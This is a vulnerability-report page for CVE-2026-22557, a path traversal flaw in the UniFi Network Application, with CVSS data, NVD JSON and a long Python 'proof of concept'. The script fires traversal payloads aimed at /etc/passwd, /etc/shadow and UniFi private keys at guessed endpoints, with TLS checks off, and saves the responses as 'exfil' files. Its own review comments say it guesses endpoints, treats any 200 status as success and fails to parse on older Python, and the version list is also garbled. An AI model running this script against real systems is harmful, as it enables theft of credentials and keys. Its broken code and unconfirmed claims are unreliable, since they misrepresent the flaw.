Security Vulnerability Report
CVE-2026-22557 CVSS 10.0 CRITICAL

CVE-2026-22557

Published: 2026-03-19 15:16:24
Last Modified: 2026-04-30 16:14:36

Description

A malicious actor with access to the network could exploit a Path Traversal vulnerability found in the UniFi Network Application to access files on the underlying system that could be manipulated to access an underlying account.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

UniFi Network Application < 8.0.26
UniFi Network Application < 7.13.x
UniFi Network Application < 6.5.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import urllib.parse  # imported but never used anywhere in this script

# CVE-2026-22557 Path Traversal PoC for UniFi Network Application
# Target: UniFi Network Application vulnerable instance
#
# NOTE(review): this is a generic directory-traversal probe, not a confirmed
# reproduction of the CVE. The endpoints below are guesses (the author's own
# comment says "adjust based on actual vulnerable endpoint"), and nothing in
# the script is taken from the vendor advisory referenced on this page, so
# a "SUCCESS" line here does not by itself demonstrate the vulnerability.
# From a detection standpoint the traffic it produces is recognisable:
# "../" / "..\" sequences in request paths and the fixed User-Agent string
# 'UniFi Network Scanner' set further down.


def exploit_cve_2026_22557(target_url: str) -> None:
    """
    Exploit Path Traversal vulnerability in UniFi Network Application
    to read arbitrary files from the underlying system.

    Sends one GET per (payload, endpoint) pair — three candidate endpoints
    for each of five traversal payloads — and prints the outcome of every
    request.

    Args:
        target_url: Base URL of the instance under test (the first command
            line argument when run as a script). A trailing '/' is stripped.

    Returns:
        None. Results go to stdout; on any HTTP 200 the full response body
        is additionally written to a file named exfil_<payload>.txt in the
        current working directory.

    Raises:
        requests.exceptions.RequestException is caught and printed. Anything
        else (for example OSError from the file write) propagates.
    """
    # Target endpoint - adjust based on actual vulnerable endpoint
    # Common endpoints in UniFi that might be vulnerable:
    # /api/s/default/admin/ - admin endpoints
    # /api/upload/ - file upload endpoints
    # /download/ - file download endpoints
    target = target_url.rstrip('/')

    # Path traversal payloads to test
    # NOTE: the Windows entry is a non-raw string, so '\.' and '\w' are
    # invalid escape sequences; the interpreter flags them with a warning
    # (SyntaxWarning on 3.12+) and the string is kept as-is here.
    payloads = [
        "../../../../etc/passwd",
        "../../../../etc/shadow",
        "..\..\..\..\windows\win.ini",
        "../../../../var/lib/unifi/key.pem",
        "../../../../usr/lib/unifi/data/sites.json"
    ]

    print(f"[*] Testing CVE-2026-22557 on {target}")
    print(f"[*] Target: UniFi Network Application")
    print(f"[*] Vulnerability: Path Traversal")
    print("-" * 50)

    for payload in payloads:
        # The try wraps the whole inner loop: a RequestException on one
        # endpoint skips the remaining endpoints for this payload.
        try:
            # Test different endpoints with path traversal
            endpoints = [
                f"{target}/api/s/default/admin/{payload}",
                f"{target}/download/{payload}",
                f"{target}/api/upload/{payload}"
            ]

            for endpoint in endpoints:
                print(f"\n[+] Testing: {endpoint}")

                # Send request with path traversal
                headers = {
                    'User-Agent': 'UniFi Network Scanner',
                    'Accept': '*/*'
                }

                # verify=False disables TLS certificate validation; requests
                # emits an InsecureRequestWarning for every such call.
                response = requests.get(endpoint, headers=headers, timeout=10, verify=False)

                # NOTE(review): a 200 alone is not evidence that a file was
                # read — the body is never inspected, so an application
                # index page or a generic error page returned with 200 is
                # reported as "SUCCESS" too.
                if response.status_code == 200:
                    print(f"[+] SUCCESS! File content retrieved:")
                    print(response.text[:500])

                    # Save to file for analysis
                    # NOTE: a backslash inside an f-string replacement field
                    # ('\\') is a SyntaxError before Python 3.12, so this
                    # file does not even parse on older interpreters.
                    filename = f"exfil_{payload.replace('/', '_').replace('\\', '_')}.txt"
                    # Opened without an explicit encoding (locale-dependent).
                    with open(filename, 'w') as f:
                        f.write(response.text)
                    # NOTE(review): "(unknown)" looks like an extraction
                    # artefact in this copy of the script; presumably the
                    # original interpolated {filename} — verify against the
                    # source.
                    print(f"[+] Content saved to (unknown)")

                elif response.status_code == 403:
                    print(f"[-] Access Forbidden (403)")
                elif response.status_code == 404:
                    print(f"[-] Endpoint not found (404)")
                else:
                    print(f"[-] Unexpected response: {response.status_code}")

        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")

    print("\n[*] PoC execution completed")
    print("[*] Note: This is for authorized security testing only")


# Main execution
if __name__ == "__main__":
    import sys

    # Exactly one positional argument (the base URL) is expected; anything
    # less prints usage and exits with status 1.
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-22557.py <target_url>")
        print("Example: python cve-2026-22557.py https://unifi.local:8443")
        sys.exit(1)

    target_url = sys.argv[1]
    exploit_cve_2026_22557(target_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22557", "sourceIdentifier": "[email protected]", "published": "2026-03-19T15:16:23.533", "lastModified": "2026-04-30T16:14:36.180", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A malicious actor with access to the network could exploit a Path Traversal vulnerability found in the UniFi Network Application to access files on the underlying system that could be manipulated to access an underlying account."}, {"lang": "es", "value": "Un actor malicioso con acceso a la red podría explotar una vulnerabilidad de salto de ruta encontrada en la aplicación UniFi Network para acceder a archivos en el sistema subyacente que podrían ser manipulados para acceder a una cuenta subyacente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://community.ui.com/releases/Security-Advisory-Bulletin-062-062/c29719c0-405e-4d4a-8f26-e343e99f931b", "source": "[email protected]"}]}}